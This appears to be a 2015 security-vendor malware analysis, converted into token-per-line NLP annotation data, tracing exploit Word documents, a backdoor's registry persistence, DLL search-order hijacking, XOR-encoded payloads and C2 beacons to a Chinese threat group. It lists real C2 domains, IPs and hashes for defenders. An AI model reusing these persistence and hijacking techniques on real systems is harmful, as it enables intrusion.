May NNP O
13 CD O
, , O
2015 CD O
By IN O
Jon NNP O
Gross(http://blog.cylance.com NNP O
/ SYM O
author NN O
/ SYM O
jon RB O
- HYPH O
gross JJ O
) -RRB- O
Share NN O
This DT O
. . O

Attackers NNS O
typically RB O
shut VBP O
down RP O
campaigns NNS O
or CC O
halt VB O
activity NN O
after IN O
they PRP O
are VBP O
exposed VBN O
by IN O
security NN O
researchers NNS O
, , O
thereby RB O
creating VBG O
the DT O
impression NN O
they PRP O
have VBP O
dropped VBN O
off IN O
the DT O
map NN O
. . O

This DT O
often RB O
leads VBZ O
to IN O
a DT O
false JJ O
sense NN O
of IN O
security NN O
within IN O
the DT O
community NN O
and CC O
perpetuates VBZ O
the DT O
idea NN O
that IN O
public JJ O
exposure NN O
makes VBZ O
us PRP O
all DT O
safer JJR O
. . O

While IN O
the DT O
exposed VBN O
activity NN O
is VBZ O
no RB O
longer RB O
observed VBN O
, , O
attackers NNS O
simply RB O
continue VBP O
in IN O
the DT O
background NN O
– HYPH O
evolving VBG O
or CC O
altering VBG O
their PRP$ O
tactics NNS O
to TO O
seamlessly RB O
continue VB O
operations NNS O
with IN O
increasingly RB O
advanced JJ O
malware NN O
. . O

So RB O
while IN O
potentially RB O
making VBG O
us PRP O
safer JJR O
in IN O
the DT O
short JJ O
- HYPH O
term NN O
, , O
exposure NN O
often RB O
forces VBZ O
a DT O
Darwinian JJ O
evolution NN O
in IN O
malware NN O
. . O

Several JJ O
months NNS O
ago IN O
I PRP O
examined VBD O
a DT O
malware NN O
- HYPH O
tainted VBN O
Word NNP O
document NN O
titled VBD O
" `` O
ISIS_twitter_list.doc NNP O
. . O
" `` O
I PRP O
did VBD O
n't RB O
think VB O
much RB O
of IN O
it PRP O
and CC O
quickly RB O
moved VBD O
on RP O
after IN O
a DT O
cursory JJ O
analysis NN O
. . O

Yet CC O
I PRP O
recently RB O
uncovered VBD O
evidence NN O
that WDT O
suggests VBZ O
it PRP O
was VBD O
the DT O
work NN O
of IN O
a DT O
well RB O
- HYPH O
known VBN O
Chinese JJ O
threat NN O
group NN O
. . O

This DT O
group NN O
is VBZ O
known VBN O
to TO O
have VB O
targeted VBN O
U.S. NNP O

government NN O
agencies NNS O
, , O
defense NN O
contractors NNS O
, , O
aerospace NN O
firms NNS O
and CC O
foreign JJ O
militaries NNS O
since IN O
2009 CD O
. . O

Until IN O
now RB O
, , O
it PRP O
was VBD O
widely RB O
believed VBN O
the DT O
actor NN O
's POS O
activities NNS O
had VBD O
largely RB O
subsided VBN O
in IN O
2013 CD O
, , O
following VBG O
numerous JJ O
public JJ O
disclosures NNS O
and CC O
detailed VBN O
analyses NNS O
of IN O
their PRP$ O
backdoors NNS O
. . O

Our PRP$ O
technical JJ O
analysis NN O
shows VBZ O
the DT O
group NN O
has VBZ O
remained VBN O
active JJ O
. . O

We PRP O
are VBP O
releasing VBG O
this DT O
data NN O
to TO O
help VB O
victims NNS O
identify VB O
and CC O
remediate VB O
the DT O
threat NN O
. . O

Click VB O
here(http://blog.cylance.com ADD O
/ HYPH O
spear NN O
- HYPH O
a DT O
- HYPH O
threat NN O
- HYPH O
actor- NN O
resurfaces#mitigation NN O
) -RRB- O
to TO O
get VB O
to IN O
recommended VBN O
mitigations NNS O
, , O
or CC O
for IN O
all PDT O
the DT O
technical JJ O
details NNS O
read VBD O
on RB O
. . O

It PRP O
all DT O
began VBD O
with IN O
the DT O
MIME NNP O
encoded VBD O
document NN O
" `` O
ISIS_twitter_list.doc NNP O
" '' O
, , O
which WDT O
exploited VBD O
the DT O
familiar JJ O
CVE-2012- NNP O
0158(http://www.cve.mitre.org NNP O
/ SYM O
cgi NN O
- HYPH O
bin NN O
/ SYM O
cvename.cgi?name NN O
= SYM O
CVE-2012 FW O
- HYPH O
0158 CD O
) -RRB- O
and CC O
was VBD O
first RB O
uploaded JJ O
to IN O
Virustotal NNP O
from IN O
a DT O
user NN O
in IN O
India NNP O
. . O

Other JJ O
targets NNS O
identified VBN O
were VBD O
predominantly RB O
located VBN O
in IN O
Australia NNP O
, , O
New NNP O
Zealand NNP O
, , O
Vietnam NNP O
and CC O
the DT O
United NNP O
States NNP O
. . O

File NN O
Details NNS O
Name NN O
ISIS_twitter_list.doc NN O
SHA256 NN O
6ba1d42c6493b18548e30bd60ca3d07a140d9d1945cf4e2b542e4a6d23913f40 CD O
File NN O
Size NN O
146,338 CD O
bytes NN O
The DT O
first JJ O
stage NN O
shellcode NN O
searches NNS O
for IN O
the DT O
marker NN O
" `` O
GfCv NNP O
" '' O
then RB O
checks VBZ O
the DT O
next JJ O
four CD O
bytes NNS O
are VBP O
" `` O
EF NNP O
FE NNP O
EC NNP O
CE NNP O
" '' O
in IN O
the DT O
document NN O
then RB O
decodes VBZ O
the DT O
second JJ O
stage NN O
shellcode NN O
using VBG O
the DT O
four CD O
- HYPH O
byte NN O
XOR NNP O
key NN O
" '' O
0x29F7C592 NN O
" '' O
. . O

This DT O
second JJ O
stage NN O
finds VBZ O
and CC O
decodes VBZ O
an DT O
encoded VBN O
executable NN O
beginning NN O
at IN O
offset NN O
0x33A2 CD O
. . O

The DT O
binary NN O
is VBZ O
encoded VBN O
using VBG O
a DT O
variable JJ O
4-byte NN O
XOR NNP O
key NN O
that WDT O
is VBZ O
generated VBN O
by IN O
starting VBG O
with IN O
the DT O
4-byte CD O
key JJ O
0x7FFEFC00 NN O
; : O
this DT O
XOR NNP O
key NN O
is VBZ O
then RB O
permutated VBN O
every DT O
four CD O
bytes NNS O
by IN O
rotating VBG O
the DT O
first JJ O
two CD O
bytes NNS O
of IN O
the DT O
key NN O
by IN O
0x1 NNP O
and CC O
shifting VBG O
the DT O
bits NNS O
of IN O
the DT O
next JJ O
two CD O
bytes NNS O
right JJ O
by IN O
0x1 NNS O
, , O
so IN O
the DT O
next JJ O
4-byte NN O
XOR NNP O
key NN O
in IN O
the DT O
series NN O
would MD O
be VB O
0x3FFF7E00 NFP O
. . O

It PRP O
includes VBZ O
some DT O
logic NN O
to TO O
exclude VB O
XOR'ng NNP O
any DT O
bytes NNS O
that WDT O
match VBP O
0x00000000 CD O
or CC O
the DT O
current JJ O
4- CD O
byte NN O
XOR NNP O
key NN O
. . O

For IN O
the DT O
binary JJ O
mathematically RB O
impaired VBN O
like IN O
myself PRP O
the DT O
4-byte NN O
keys NNS O
will MD O
eventually RB O
repeat VB O
in IN O
effect NN O
creating VBG O
a DT O
256-byte CD O
XOR NNP O
key NN O
. . O

The DT O
decoded JJ O
binary NN O
will MD O
be VB O
written VBN O
to IN O
the DT O
filesystem NN O
as IN O
" `` O
% NN O
APPDATA%\Microsoft\Systemcertificates\Certificates.ocx NNP O
" '' O
. . O

File NN O
Details NNS O
Full JJ O
File NNP O
Path NN O
% NN O
APPDATA%\Microsoft\Systemcertificates\Certificates.ocx SYM O
SHA256 FW O
9d838fd9d21778ed9dc02226302b486d70ed13d4b3d914a3b512ea07bf67e165 CD O
File NN O
Size NNP O
107,008 CD O
bytes NNS O
Compile VB O
Time NNP O
2/4/2015 CD O
8:41:42 CD O
UTC NNP O
The DT B-Entity
malware NN I-Entity
does VBZ O
not RB O
execute VB O
immediately RB O
after IN O
successful JJ O
exploitation NN O
and CC O
instead RB O
just RB O
creates VBZ B-Action
a DT O
Run NNP B-Entity
key JJ I-Entity
in IN B-Modifier
the DT O
current JJ B-Entity
user NN I-Entity
's POS I-Entity
hive NN I-Entity
which WDT O
will MD O
execute VB O
the DT O
next JJ O
time NN O
the DT O
victim NN O
user NN O
accesses VBZ O
the DT O
system NN O
. . O

Registry NNP O
Persistence NNP O
Key NNP O
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Certificates NNPS O
Registry NNP O
Key NNP O
Value NNP O
Rundll32.exe NNP O
" '' O
% NN O
APPDATA%\Microsoft\SystemCertificates\Certificates.ocx",Setup NNP O
The DT O
ocx NN O
file NN O
is VBZ O
actually RB O
a DT O
DLL NNP O
and CC O
provides VBZ O
the DT B-Entity
attacker NN I-Entity
the DT O
ability NN O
to TO O
upload NN B-Action
, , O
download NN B-Action
, , O
enumerate NN B-Action
, , O
delete VBZ B-Action
, , O
search NN B-Action
, , O
and CC O
execute VB B-Action
files VBZ B-Entity
as RB O
well RB O
as IN O
list NN B-Action
drivers NNS B-Entity
on IN B-Modifier
the DT O
system NN B-Entity
. . O

The DT O
binary NN O
is VBZ O
designed VBN O
to TO O
be VB O
called VBN O
from IN O
its PRP$ O
one CD O
exported VBN O
function NN O
, , O
" `` O
Setup NNP O
" '' O
; : O
the DT O
Run NNP O
key NN O
will MD O
ensure VB O
that IN O
whenever WRB B-Modifier
the DT O
victim NN B-Entity
user NN I-Entity
logs VBZ I-Entity
into IN I-Entity
the DT I-Entity
system NN I-Entity
the DT O
backdoor JJ B-Entity
will MD O
execute VB B-Action
. . O

The DT O
binary JJ B-Entity
is VBZ O
configured VBN O
to IN O
communicate VB B-Action
to IN B-Modifier
" '' O
www.microsoftservices.proxydns.com ADD B-Entity
" `` I-Entity
on IN B-Modifier
port NN O
80 CD B-Entity
using VBG B-Modifier
standard NN O
HTTP NNP B-Entity
POST NNP I-Entity
and CC I-Entity
GET NNP I-Entity
requests VBZ I-Entity
. . O

The DT O
domain NN O
at IN O
the DT O
time NN O
of IN O
this DT O
report NN O
resolved VBD O
to IN O
the DT O
IP NNP O
address NN O
, , O
" `` O
103.229.125.157 CD O
" '' O
. . O

Additionally RB O
the DT O
dynamic JJ O
DNS NN O
domains NNS O
" '' O
fighthard.mooo.com ADD O
" `` O
and CC O
" `` O
rampage.freetcp.com ADD O
" `` O
have VBP O
both DT O
historically RB O
resolved VBN O
to IN O
this DT O
IP NNP O
address NN O
. . O

Example NN O
initial JJ O
beacon NN O
request NN O
. . O

GET VB O
/login?wd . O
= SYM O
hvJZkcIvKKupNRlsqI0aN6jZDTYPz6ZS9Q- ADD O
H5bCXiER37jqqCDzS3wIUulYOjyKHcDomZCD72mAc4fSCoHhJJ1UQliBkraMepzS5J3UUFUH- NNP O
nofoOgVM02UlCs4LJANIuZH90vM5KH_Ih59DdVRbgQ== CD O
HTTP/1.1 NNP O
User NNP O
- HYPH O
Agent NNP O
: : O
Mozilla/4.0 NNP O
( -LRB- O
compatible JJ O
; : O
MSIE NNP O
7.0 CD O
; : O
Windows NNP O
NT NNP O
5.1 CD O
; : O
Trident/4.0 CD O
; : O
.NET CD O
CLR NNP O
2.0.50727 CD O
; : O
.NET CD O
CLR NNP O
3.0.4506.2152 CD O
; : O
.NET CD O
CLR NNP O
3.5.30729 CD O
; : O
.NET CD O
CLR NNP O
1.1.4322 CD O
) -RRB- O
Host NN O
: : O
www.microsoftservices.proxydns.com ADD O
Cache NNP O
- HYPH O
Control NNP O
: : O
no DT O
- HYPH O
cache NN O
The DT O
above JJ O
beacon NN O
request NN O
can MD O
be VB O
decoded VBN O
by IN O
base64 NN O
decoding VBG O
with IN O
this DT O
alphabet NN O
, , O
" '' O
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789- NNP O
_ : O
" '' O
. . O

Then RB O
RC4 NNP O
decrypting VBG O
the DT O
resulting VBG O
string NN O
using VBG O
the DT O
first JJ O
four CD O
bytes NNS O
of IN O
the DT O
payload NN O
as IN O
the DT O
decryption NN O
key NN O
. . O

The DT O
following VBG O
python NN O
script NN O
will MD O
make VB O
this DT O
easy JJ O
. . O

from IN O
Crypto NNP O
. . O
Cipher NNP O
import NN O
ARC4 NNP O
Decoding VBG O
the DT O
string NN O
will MD O
yield VB O
the DT O
following VBG O
. . O

Where WRB O
k NN O
: : O
is VBZ O
a DT O
unique JJ O
identifier NN O
for IN O
the DT O
victim NN O
, , O
s NN O
: : O
is VBZ O
a DT O
campaign NN O
identifier NN O
included VBD O
in IN O
the DT O
backdoor JJ O
, , O
h NN O
: : O
is VBZ O
the DT O
hostname NN O
of IN O
the DT O
victim NN O
computer NN O
, , O
u NN O
: : O
is VBZ O
the DT O
victim NN O
user NN O
, , O
o NN O
: : O
is VBZ O
the DT O
operating NN O
system NN O
and CC O
service NN O
pack NN O
level NN O
, , O
and CC O
m NN O
is VBZ O
the DT O
mac NN O
address NN O
. . O

Based VBN O
upon IN O
some DT O
cursory JJ O
analysis NN O
the DT B-Entity
backdoor JJ I-Entity
will MD O
look VB B-Action
for IN I-Action
encrypted VBD O
commands NNS B-Entity
within IN B-Modifier
HTML NNP O
comments NNS B-Entity
returned VBD I-Entity
from IN I-Entity
the DT I-Entity
C2 NNP I-Entity
using VBG O
the DT O
following JJ O
format NN O
: : O
" `` O
< XX O
! . O
? . O
* NFP O
$ $ O
@COMMAND CD O
GOES VBZ O
HERE@$ NFP O
* NFP O
? . O
! . O
> XX O
;"however LS O
, , O
the DT O
C2 NNP O
was VBD O
not RB O
active JJ O
at IN O
the DT O
time NN O
of IN O
analysis NN O
so IN O
this DT O
could MD O
not RB O
be VB O
confirmed VBN O
. . O

The DT O
backdoor JJ B-Entity
may MD O
also RB O
make VB B-Action
requests VBZ B-Entity
to IN B-Modifier
the DT O
C2 NNP B-Entity
over IN B-Modifier
HTTP NNP B-Entity
using VBG B-Modifier
the DT O
following VBG B-Entity
parameters NNS I-Entity
in IN I-Entity
the DT I-Entity
URI NNP I-Entity
string NN I-Entity
" '' O
query?sid= NN O
" '' O
and CC O
" `` O
result VB O
? . O
sid= NN O
" '' O
. . O

The DT O
PDB NNP O
path NN O
, , O
C:\Codes\Eoehttp\Release\Eoehttp.pdb NNP O
, , O
was VBD O
also RB O
left VBN O
in IN O
the DT O
backdoor JJ O
although IN O
no DT O
other JJ O
instances NNS O
of IN O
this DT O
path NN O
could MD O
be VB O
identified VBN O
. . O

Several JJ O
additional JJ O
exploit NN O
documents NNS O
were VBD O
identified VBN O
by IN O
investigating VBG O
the DT O
domains NNS O
" `` O
fighthard.mooo.com ADD O
" '' O
and CC O
" `` O
rampage.freetcp.com ADD O
" '' O
. . O

Fighthard.mooo.com ADD O
additionally RB O
resolved VBN O
to IN O
173.224.214.12 CD O
in IN O
February NNP O
of IN O
2014 CD O
. . O

The DT O
following VBG O
exploit NN O
documents NNS O
were VBD O
identified VBN O
to TO O
contain VB O
a DT O
payload NN O
which WDT O
communicated VBD O
to IN O
this DT O
domain NN O
. . O

Naval NNP O
Science NNP O
Curriculum NNP O
2014.doc CD O
8794189aad922f2287a56c5e2405b9fd8affd136286aad7ed893b90cd2b76b9c CD O
1.doc CD O
c593a844a87b3e40346efd5d314c55c5094d5bf191f9bb1aeec8078f6d07c0cd NNP O
Republic NNP O
Day NNP O
speech NN O
27 CD O
Jan NNP O
2014.doc NNP O
3219767408bba3fa41b9ab5f964531cf608fb0288684748d6ac0b50cf108c911 CD O
Rampage.freetcp.com NNP O
still RB O
resolves VBZ O
to IN O
103.229.125.157 CD O
as IN O
of IN O
4/2/2015 CD O
Let NNP O
's PRP O
go VB O
ahead RB O
and CC O
take VB O
a DT O
look NN O
further RB O
into IN O
one CD O
of IN O
the DT O
other JJ O
expoit NN O
documents NNS O
, , O
8794189aad922f2287a56c5e2405b9fd8affd136286aad7ed893b90cd2b76b9c CD O
. . O

SHA256 NN O
8794189aad922f2287a56c5e2405b9fd8affd136286aad7ed893b90cd2b76b9c CD O
Name NNP O
Naval NNP O
Science NNP O
Curriculum NNP O
2014.doc NNP O
File NNP O
Size NNP O
459,087 CD O
The DT O
document NN O
exploits VBZ O
old JJ O
faithful JJ O
, , O
CVE-2012 NNP O
- HYPH O
0158(http://www.cve.mitre.org NNP O
/ NFP O
cgi NN O
- HYPH O
bin NN O
/ HYPH O
cvename.cgi JJ O
? . O
name NN O
= SYM O
CVE-2012 NNP O
- HYPH O
0158 NNP O
) -RRB- O
, , O
but CC O
instead RB O
of IN O
using VBG O
a DT O
MIME NNP O
encoded VBN O
document NN O
this DT O
file NN O
was VBD O
just RB O
a DT O
plain JJ O
RTX NNP O
document NN O
. . O

Yes UH O
that DT O
's VBZ O
not RB O
a DT O
misspelling NN O
Word NNP O
is VBZ O
happy JJ O
to TO O
open VB O
this DT O
RTF NNP O
format NN O
as RB O
well RB O
. . O

So RB O
for IN O
anyone NN O
exploring VBG O
and CC O
hunting VBG O
RTF NNP O
documents NNS O
you PRP O
may MD O
also RB O
want VB O
to TO O
start VB O
looking VBG O
for IN O
the DT O
" `` O
{ -LRB- O
\rtx NN O
" `` O
header NN O
. . O

We PRP O
'll MD O
skip VB O
the DT O
shellcode NN O
analysis NN O
for IN O
now RB O
and CC O
go VB O
directly RB O
to IN O
the DT O
binary NN O
which WDT O
is VBZ O
stored VBN O
beginning VBG O
at IN O
offset NN O
0x1BC27 NFP O
as IN O
an DT O
ASCII NNP O
hex NN O
- HYPH O
encoded VBN O
, , O
xor NNP O
- HYPH O
encoded VBN O
binary NN O
. . O

It PRP O
can MD O
be VB O
decoded VBN O
using VBG O
the DT O
XOR NNP O
key NN O
" '' O
0xBF NN O
" '' O
. . O

Upon IN O
successful JJ O
exploitation NN O
the DT O
decoded JJ O
binary NN O
will MD O
be VB O
written VBN O
first RB O
to IN O
% NN O
TEMP%\dw20.EXEthen NNP O
copied VBN O
to IN O
% NN O
WINDIR%\msascm32.drv NNP O
. . O

No DT O
other JJ O
changes NNS O
are VBP O
made VBN O
to IN O
the DT O
system NN O
. . O

File NN O
Details NNS O
Full JJ O
File JJ O
Path NN O
: : O
% NN O
WINDIR%\msacm32.drv NNP O
SHA256 NNP O
: : O
67bd81f4c5e129d19ae71077be8b68dc60e16c19019b2c64cdcedca1f43f0ae3 CD O
File NN O
Size NN O
: : O
108,544 CD O
Bytes NNPS O
Compile NNP O
Time NNP O
: : O
9/26/2013 CD O
01:46:23 CD O
UTC NNP O
I PRP O
'm VBP O
always RB O
curious JJ O
when WRB O
no DT O
registry NN O
changes NNS O
are VBP O
made VBN O
in IN O
the DT O
exploitation NN O
process NN O
. . O

At IN O
first RB O
the DT O
backdoor NN O
failed VBD O
to TO O
load VB O
or CC O
really RB O
do VB O
anything NN O
in IN O
my PRP$ O
VM NNP O
until IN O
I PRP O
read VBD O
what WP O
the DT O
" `` O
msascm32.drv NN O
" '' O
file NN O
does VBZ O
. . O

Looking VBG O
at IN O
the DT O
original JJ O
file NN O
's POS O
( -LRB- O
% NN O
WINDIR%\system32\msacm32.drv NNP O
) -RRB- O
imported VBN O
functions NNS O
, , O
it PRP O
's VBZ O
clear JJ O
the DT O
DLL NNP O
is VBZ O
responsible JJ O
for IN O
some DT O
type NN O
of IN O
audio NN O
processing NN O
and/or CC O
playback NN O
. . O

A DT O
quick JJ O
search NN O
on IN O
the DT O
internet NN O
confirmed VBD O
this DT O
so IN O
I PRP O
added VBD O
a DT O
soundcard NN O
to IN O
my PRP$ O
VM NNP O
. . O

On IN B-Modifier
reboot NN B-Entity
explorer.exe DT B-Entity
was VBD O
now RB O
happy JJ O
to IN O
load NN B-Action
the DT O
backdoor JJ B-Entity
and CC O
get VB O
down RP O
to IN O
business NN O
; : O
this DT O
technique NN O
is VBZ O
known VBN O
as IN O
dll NN O
search NN O
order NN O
hijacking NN O
or CC O
binary JJ O
planting NN O
. . O

Interestingly RB O
the DT B-Entity
backdoor JJ I-Entity
will MD O
also RB O
load NN B-Action
the DT O
legitimate JJ B-Entity
system32\msacm32.drv NNS I-Entity
file VBP I-Entity
resolve NN O
functions NNS O
and CC O
pass VB O
calls NNS O
to IN O
it PRP O
so IN O
it PRP O
does VBZ O
n't RB O
break VB O
audio JJ O
playback NN O
on IN O
the DT O
victim NN O
system NN O
. . O

The DT O
backdoor JJ B-Entity
contains VBZ B-Action
identical JJ O
exports NNS B-Entity
as RB O
well RB O
as IN O
an DT O
additional JJ B-Entity
dummy JJ I-Entity
function NN I-Entity
from IN I-Entity
the DT I-Entity
legitimate NN I-Entity
msacm32.drvcalled VBD I-Entity
" `` I-Entity
StartWork NNP I-Entity
" '' I-Entity
which WDT O
can MD O
be VB O
used VBN O
to TO O
reliably RB O
identify VB O
similar JJ O
samples NNS O
. . O

The DT O
backdoor JJ B-Entity
routine JJ I-Entity
exists VBZ O
inside IN O
the DT O
DllMain NNP O
function NN O
so RB O
when WRB O
explorer.exeloads NNS O
the DT O
backdoor JJ O
via IN O
LoadLibrary NNP O
it PRP B-Entity
will MD O
begin VB O
spawning VBG B-Action
malicious JJ O
threads NNS B-Entity
. . O

A DT O
PDB NNP O
path NN O
was VBD O
also RB O
left VBN O
in IN O
this DT O
binary JJ O
C:\Users\cmd\Desktop\msacm32\Release\msacm32.pdb NN O
; : O
A DT O
quick JJ O
google NN O
search NN O
will MD O
lead VB O
you PRP O
to IN O
a DT O
YARA NNP O
rule NN O
written VBN O
by IN O
Patrick NNP O
Olsen NNP O
and CC O
the DT O
very RB O
similar JJ O
sample NN O
869fa4dfdbabfabe87d334f85ddda234 CD O
which WDT O
communicates VBZ O
to IN O
www.micro1.zyns.com ADD O
on IN O
TCP NNP O
port NN O
80 CD O
. . O

The DT O
two CD O
files NNS O
also RB O
have VBP O
an DT O
identical JJ O
compilation NN O
time NN O
, , O
which WDT O
suggests VBZ O
the DT O
backdoor NN O
is VBZ O
probably RB O
not RB O
recompiled VBN O
very RB O
often RB O
and CC O
instead RB O
the DT O
attacker NN O
simply RB O
updates VBZ O
the DT O
callback NN O
configuration NN O
information NN O
. . O

The DT O
backdoor JJ O
interestingly RB O
contains VBZ O
the DT O
well RB O
known VBN O
Poison NNP O
Ivy NNP O
RAT NNP O
shellcode NN O
as RB O
well RB O
as IN O
its PRP$ O
own JJ O
custom NN O
backdoor NN O
. . O

It PRP O
will MD O
first RB O
attempt VB O
to TO O
communicate VB O
to IN O
fighthard.mooo.com ADD O
using VBG O
the DT O
poison NN O
ivy NN O
binary NN O
protocol NN O
with IN O
the DT O
default NN O
connection NN O
password NN O
of IN O
" `` O
admin NN O
" '' O
. . O

The DT O
Poison NNP O
Ivy NNP O
shellcode NN O
is VBZ O
encrypted VBN O
using VBG O
a DT O
custom NN O
cipher NN O
with IN O
the DT O
key NN O
" `` O
Tiger324 NNP O
{ -LRB- O
" `` O
beginning VBG O
at IN O
offset NN O
0xFA5 CD O
and CC O
ending VBG O
at IN O
0x159E. CD O

If IN O
this DT O
initial JJ O
connection NN O
fails VBZ O
it PRP O
will MD O
revert VB O
to IN O
the DT O
secondary JJ O
backdoor NN O
, , O
which WDT O
utilizes VBZ O
HTTP NNP O
GET NNP O
and CC O
POST NNP O
requests VBZ O
somewhat RB O
similar JJ O
to IN O
the DT O
ones NNS O
described VBN O
above IN O
to IN O
the DT O
internal JJ O
IP NN O
address NN O
" `` O
192.168.2.26 CD O
" '' O
. . O

This DT O
suggested VBD O
the DT O
attacker NN O
had VBD O
already RB O
compromised VBN O
other JJ O
systems NNS O
in IN O
the DT O
environment NN O
and CC O
was VBD O
using VBG O
an DT O
internal JJ O
C2 NN O
mechanism NN O
for IN O
a DT O
fallback NN O
. . O

Example NNP O
Internal NNP O
Beacon NNP O
. . O

GET VB O
/login.asp . O
? . O
p*hWe8J5pF*k5xv5XeUhIJbKZQfySZRv1NcwhQi2ZHKKvGBC8EjiadbWLoUcgUxJyZElD7AY0DCWmzbIa9IX XX O
EJ7OZkvwBZVx1JsrhQ== CD O
HTTP/1.1 NNP O
User NNP O
- HYPH O
Agent NNP O
: : O
Mozilla/4.0 NNP O
( -LRB- O
compatible JJ O
; : O
MSIE NNP O
8.0 CD O
; : O
Win32 NNP O
) -RRB- O
Host NN O
: : O
192.168.2.26 CD O
Requests NNS O
may MD O
also RB O
be VB O
made VBN O
to IN O
the DT O
following JJ O
pages NNS O
: : O
" `` O
check.asp NN O
" '' O
, , O
" `` O
result.asp NN O
" '' O
, , O
and CC O
" `` O
upload.asp JJ O
" '' O
. . O

The DT O
request NN O
structure NN O
is VBZ O
slightly RB O
different JJ O
in IN O
that IN O
it PRP O
uses VBZ O
the DT O
base64 JJ O
alphabet NN O
" '' O
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789 NN O
+ SYM O
* NFP O
" '' O
. . O

The DT O
resulting VBG O
request NN O
can MD O
be VB O
decoded VBN O
further RB O
by IN O
using VBG O
the DT O
first JJ O
16 CD O
bytes NNS O
of IN O
the DT O
result NN O
as IN O
an DT O
XOR NNP O
key NN O
to TO O
decode VB O
the DT O
rest NN O
of IN O
the DT O
payload NN O
. . O

It PRP O
also RB O
uses VBZ O
a DT O
static JJ O
User NNP O
- HYPH O
Agent NNP O
string NN O
of IN O
" `` O
Mozilla/4.0 NNP O
( -LRB- O
compatible JJ O
; : O
MSIE NNP O
8.0 CD O
; : O
Win32 NNP O
) -RRB- O
" `` O
for IN O
each DT O
request NN O
. . O

The DT O
following NN O
script NN O
simplifies VBZ O
this DT O
process NN O
. . O

The DT O
request NN O
decodes VBZ O
to TO O
" `` O
123|000000+|USER CD O
- HYPH O
D6921F6215|Administrator|-1676096002|1.0|0| NN O
" '' O
, , O
where WRB O
values NNS O
are VBP O
separated VBN O
by IN O
the DT O
delimiter NN O
" `` O
| NN O
" '' O
. . O

" `` O
123 CD O
" '' O
is VBZ O
a DT O
campaign NN O
identifier NN O
hard RB O
coded VBD O
into IN O
the DT O
backdoor JJ O
. . O

I PRP O
do VBP O
n't RB O
know VB O
what WP O
" `` O
000000 CD O
+ NN O
" `` O
is VBZ O
but CC O
it PRP O
's VBZ O
also RB O
a DT O
hard JJ O
coded JJ O
value NN O
; : O
my PRP$ O
best JJS O
guess NN O
is VBZ O
it PRP O
's VBZ O
to TO O
modify VB O
the DT O
timezone NN O
of IN O
the DT O
timestamp NN O
. . O

" `` O
USER NNP O
- HYPH O
D6921F6215 NNP O
" '' O
is VBZ O
the DT O
hostname NN O
of IN O
the DT O
victim NN O
, , O
" `` O
Administrator NN O
" '' O
is VBZ O
the DT O
victim NN O
user NN O
, , O
" `` O
1676096002 CD O
" '' O
is VBZ O
the DT O
current JJ O
Date NN O
/ SYM O
Time NN O
in IN O
decimal NN O
, , O
and CC O
" `` O
1.0 CD O
" '' O
is VBZ O
a DT O
version NN O
number NN O
also RB O
stored VBN O
in IN O
the DT O
backdoor NN O
. . O
The DT O
16-byte JJ O
XOR NNP O
key NN O
will MD O
be VB O
randomly RB O
generated VBN O
per IN O
each DT O
request NN O
. . O

Results NNS O
from IN O
commands NNS O
will MD O
be VB O
sent VBN O
back RB O
encoded JJ O
to IN O
the DT O
server NN O
to IN O
the DT O
" `` O
result.asp JJ O
" '' O
page NN O
. . O

The DT O
backdoor JJ B-Entity
will MD O
accept VB O
the DT O
following JJ O
commands NNS O
. . O

Commands NNS O
with IN O
a DT O
? . O
appear VB O
to TO O
take VB O
an DT O
additional JJ O
parameter NN O
while IN O
files NNS O
that WDT O
end VBP O
in IN O
- HYPH O
require VB O
a DT O
full JJ O
file NN O
path NN O
. . O

The DT O
backdoor NN O
is VBZ O
also RB O
capable JJ O
of IN O
elevating VBG O
its PRP$ O
privileges NNS O
on IN O
win7 NN O
and CC O
above IN O
using VBG O
a DT O
method NN O
similar JJ O
to IN O
the DT O
one CD O
described VBN O
here RB O
: : O
http://www.pretentiousname.com/misc/win7_uac_whitelist2.html ADD O
. . O

I PRP O
thought VBD O
it PRP O
was VBD O
interesting JJ O
the DT O
backdoor JJ O
used VBN O
a DT O
secondary JJ O
backup NN O
backdoor JJ O
in IN O
addition NN O
to IN O
its PRP$ O
primary JJ O
payload NN O
. . O

The DT O
first JJ O
communicated VBN O
directly RB O
outside IN O
the DT O
network NN O
using VBG O
a DT O
well RB O
known JJ O
RAT NN O
protocol NN O
and CC O
if IN O
that DT O
failed VBD O
the DT O
secondary JJ O
much JJ O
stealthier NN O
backdoor NN O
communicated VBN O
to IN O
an DT O
internal JJ O
C2 NN O
address NN O
using VBG O
it PRP O
's POS O
own JJ O
custom NN O
encoded VBD O
HTTP NNP O
based VBN O
protocol NN O
. . O

The DT O
use NN O
of IN O
a DT O
relatively RB O
undisclosed JJ O
DLL NNP O
search NN O
order NN O
hijack NN O
also RB O
made VBD O
this DT O
sample NN O
unique JJ O
. . O

Detection NN O
rates NNS O
for IN O
this DT O
binary NN O
seem VB O
to TO O
be VB O
pretty RB O
good JJ O
right RB O
now RB O
39/57 CD O
; : O
however RB O
, , O
at IN O
the DT O
time NN O
it PRP O
was VBD O
first RB O
used VBN O
in IN O
late JJ O
January NNP O
2014 CD O
detection NN O
rates NNS O
were VBD O
much JJ O
poorer JJR O
. . O

Other JJ O
samples NNS O
from IN O
the DT O
identified VBN O
exploit NN O
documents NNS O
were VBD O
similar JJ O
to IN O
the DT O
one NN O
described VBN O
above IN O
with IN O
different JJ O
network NN O
callbacks NNS O
. . O

And CC O
now RB O
to TO O
tie VB O
all PDT O
this DT O
back NN O
to IN O
the DT O
" `` O
well RB O
- HYPH O
known VBN O
" '' O
threat NN O
group NN O
. . O

The DT O
" `` O
173.224.214.12 CD O
" '' O
IP NNP O
address NN O
that IN O
" `` O
fighthard.mooo.com ADD O
" '' O
previously RB O
resolved VBD O
to TO O
also RB O
historically RB O
had VBD O
two CD O
other JJ O
domains NNS O
point NN O
to IN O
it PRP O
" `` O
queenberry.www1.biz ADD O
" '' O
and CC O
" `` O
word.crabdance.com ADD O
" '' O
. . O

" `` O
word.crabdance.com ADD O
" '' O
previously RB O
resolved VBN O
to IN O
" `` O
64.71.162.70 CD O
" '' O
on IN O
September NNP O
8 CD O
, , O
2012 CD O
and CC O
108.171.246.140 CD O
on IN O
February NNP O
19 CD O
, , O
2014 CD O
. . O

The DT O
" `` O
64.71.162.70 CD O
" '' O
address NN O
and CC O
the DT O
associated JJ O
domain NN O
" '' O
www.ollay011.zyns.com ADD O
" `` O
are VBP O
rather RB O
infamous JJ O
and CC O
the DT O
first JJ O
